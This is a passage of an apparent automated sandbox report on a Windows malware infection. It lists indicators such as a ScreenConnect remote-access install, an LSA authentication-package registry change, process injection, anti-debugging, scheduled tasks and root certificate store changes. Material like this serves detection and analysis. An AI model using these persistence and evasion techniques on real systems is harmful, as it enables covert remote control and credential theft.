(read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000600000001c59b-265.dat autoit_exe behavioral1/files/0x000400000001cd3b-1294.dat autoit_exe behavioral1/files/0x000400000001cd5d-1308.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390031006200370064003300370035003100330030006600320039003400610029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\2xwsqqhh.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\2xwsqqhh.newcfg ScreenConnect.ClientService.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
pid Process 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 1976 skotes.exe 2352 kdMujZh.exe 2104 meuldlt.exe 1076 MAl7pjE.exe 1300 TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE 2232 95b5695165.exe 3016 edfeb1d137.exe 1428 483d2fa8a0d53818306efeb32d3.exe 2240 5c9cf0fb93.exe 1224 1225f1d26c.exe 3240 MAl7pjE.exe 3752 05a9811bd3.exe 1440 d317e9c8c3.exe 4048 74caf6e3ae.exe 1408 a18028f754.exe 3520 72bd9825d6.exe 3792 meuldlt.exe 3536 2c86c1330a.exe 2432 caf15a14e4.exe 3680 TempU2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE 3420 d823df7c9a.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 1256 set thread context of 1848 1256 NL58452.exe 35 PID 696 set thread context of 580 696 f3Ypd8O.exe 39 PID 2232 set thread context of 2476 2232 95b5695165.exe 91 PID 2904 set thread context of 1524 2904 7aencsM.exe 98 PID 1464 set thread context of 1472 1464 Bjkm5hE.exe 102 PID 1144 set thread context of 2524 1144 monthdragon.exe 105 PID 2236 set thread context of 2948 2236 f3Ypd8O.exe 108 PID 2904 set thread context of 3084 2904 NL58452.exe 113 PID 3520 set thread context of 2972 3520 72bd9825d6.exe 125 PID 1972 set thread context of 4108 1972 f2b5b2a0f4.exe 158 -
resource yara_rule behavioral1/files/0x00060000000196a1-37.dat upx behavioral1/memory/2176-49-0x0000000001230000-0x00000000024F2000-memory.dmp upx behavioral1/memory/2176-51-0x0000000001230000-0x00000000024F2000-memory.dmp upx -
Drops file in Program Files directory 17 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\Installer\f78628b.ipi msiexec.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\Tasks\meuldlt.job kdMujZh.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\f78628b.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI669F.tmp msiexec.exe File created C:\Windows\Installer\wix{E7FFB52F-03E7-9BA2-D37A-094243CEF563}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File created C:\Windows\Installer\f78628a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI6848.tmp msiexec.exe File created C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\meuldlt.job kdMujZh.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File created C:\Windows\Installer\f78628d.msi msiexec.exe File opened for modification C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\skotes.job 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe File opened for modification C:\Windows\Installer\f78628a.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI66C0.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 2392 1256 WerFault.exe 33 864 696 WerFault.exe 38 3012 2240 WerFault.exe 87 1924 2904 WerFault.exe 97 864 1464 WerFault.exe 101 2808 1144 WerFault.exe 104 2564 2236 WerFault.exe 107 2168 2904 WerFault.exe 112 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MAl7pjE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caf15a14e4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f5719c55e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d823df7c9a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1225f1d26c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MAl7pjE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 05a9811bd3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2d9223dc79.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 31459b3435.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sQ3DZPU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage f5719c55e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language meuldlt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language edfeb1d137.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kdMujZh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 95b5695165.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5c9cf0fb93.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language f5719c55e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1EoH8b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b95bc460f0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sQ3DZPU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72bd9825d6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2c86c1330a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5c9cf0fb93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5c9cf0fb93.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1932 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ScreenConnect.WindowsClient.exe -
Kills process with taskkill 5 IoCs
pid Process 2980 taskkill.exe 2216 taskkill.exe 2964 taskkill.exe 2656 taskkill.exe 1392 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 52 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductName = "ScreenConnect Client (91b7d375130f294a)" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\ = "ScreenConnect Client (91b7d375130f294a) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\PackageCode = "F25BFF7E7E302AB93DA7902434EC5F36" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductIcon = "C:\\Windows\\Installer\\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\\DefaultIcon" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Clients = 3a0000000000 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB} msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Version = "402849799" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media\1 = ";" msiexec.exe -
Modifies system certificate store 2 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 